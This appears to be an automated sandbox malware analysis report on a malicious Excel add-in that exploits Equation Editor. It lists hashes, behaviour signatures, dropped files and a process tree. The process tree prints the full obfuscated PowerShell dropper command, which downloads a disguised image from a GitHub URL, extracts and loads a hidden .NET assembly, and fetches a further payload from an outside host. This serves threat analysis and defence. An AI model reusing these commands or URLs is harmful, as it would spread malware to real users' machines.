Analysis

  • max time kernel
    61s
  • max time network
    18s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags
    arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
  • submitted
    13/10/2024, 01:58

General

  • Target

    f3ca53807f32ccbc241ce2b92d7ab0727cfdf45e3fd88b9e3ac9a063f0aff086.xlam

  • Size

    736KB

  • MD5

    7c34b23b4b7cb66c2393128c3f55a0e1

  • SHA1

    2cf918f985476c7d3988b7d2ac530d32c59de12d

  • SHA256

    f3ca53807f32ccbc241ce2b92d7ab0727cfdf45e3fd88b9e3ac9a063f0aff086

  • SHA512

    cd2d8d1f2e3accb677bed9be2a335253240458babedb514d88f31e980ed2740ebe586463fecf06ce5e3670ac430b1c54faf48732d29a98abeca28dae9daf537b

  • SSDEEP

    12288:4gDGK/3uJ3WSZvFsxoHXYo1NmcCYlnjeRKZLImngMVTGckDI:jqKg35DHoojmcCEnjeyLImnLVTv

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

exe.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs PowerShell with its display window hidden.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\f3ca53807f32ccbc241ce2b92d7ab0727cfdf45e3fd88b9e3ac9a063f0aff086.xlam
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2256
  • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:2872
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\mediciniiiiiffredating.vbs"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2932
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2868
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('yjLimageUrl = YqLhttps://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg YqL;yjLwebClient = New-Object System.Net.WebClie'+'nt;yjLimageB'+'ytes = yjLwebClient.DownloadData(yjLimageUrl);yjLimageText = [System.Text.Encoding]::UTF8.GetString(yjLimageBytes);yj'+'Lst'+'artFlag = YqL<<BASE64_START'+'>>YqL;yjLendFlag = YqL<<BASE64_END>>YqL;yjLstartIndex = yjLimageText.IndexOf(y'+'jLstartFlag);yjLendIndex = yjLimageText.IndexOf(yjLendFlag);yjLstartIndex -ge 0 -and yjLe'+'ndI'+'ndex -gt yjLstartIndex;yjLs'+'tartIndex += yjLstartFlag'+'.Length;yjLbase64Length = yjLendIndex - yjLstartIndex;yjLbase64Command = yjLimageText.Substring(yjLsta'+'rtIndex, yjLbase64Length'+');yjLcommandBytes = [System.Convert]::FromBase6'+'4String(yj'+'Lbas'+'e64Command);yjLloadedAssembly = [System.Reflection.Assembly]::Load(yjLco'+'mmandBytes);yjLvaiM'+'ethod = [dnlib.IO.Home].GetMethod(YqLVAIYqL);yjLvaiMethod.Invoke('+'yjLnull, '+'@(YqLtxt.44446esa'+'b'+'bbbbbewmadam/431.871.64.891//:ptthYqL, YqLdesativadoYqL, YqLdesativadoYqL, YqLdesativadoYqL, YqLAddInProcess32YqL, YqLdesativadoYqL, YqLdesativadoYqL));').RePlaCE('yjL','$').RePlaCE('YqL',[stRING][ChAr]39) | iex"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2772

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    53143954570c9507ef372f2506c56772

    SHA1

    aed624cca6e5ff06c8eded5d06bd5d84db3c7c64

    SHA256

    3568d8a5e8d5e26d16aaed26195aeee24cafb9b867de69d521f23336200641c0

    SHA512

    afce48ff53df539214002df623598bc961b42242ec1ab0778d2df1caf6b46a8cd75512628cc0e61370bb20a68ea85be7bda6447e9c7210ddda493b5be46d7554

  • C:\Users\Admin\AppData\Roaming\mediciniiiiiffredating.vbs

    Filesize

    189KB

    MD5

    ba21082c47f33b42f6243198bea92684

    SHA1

    d0a7314525f30708cffd5273feb1fc24ff33523c

    SHA256

    6be117567324f1c1db4f2cbf48a25a3eaa24904238a37ab3b5e49b6970078b65

    SHA512

    dc21e6b490cb9f1b262622c28da8d8ce087bf1357b3f939f2e4fbe5339cd647045b4c89aeeb2543097b4b688643fead1547de59583659c16c5a8d0d530e54217

  • memory/2256-1-0x000000007233D000-0x0000000072348000-memory.dmp

    Filesize

    44KB

  • memory/2256-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2256-16-0x000000007233D000-0x0000000072348000-memory.dmp

    Filesize

    44KB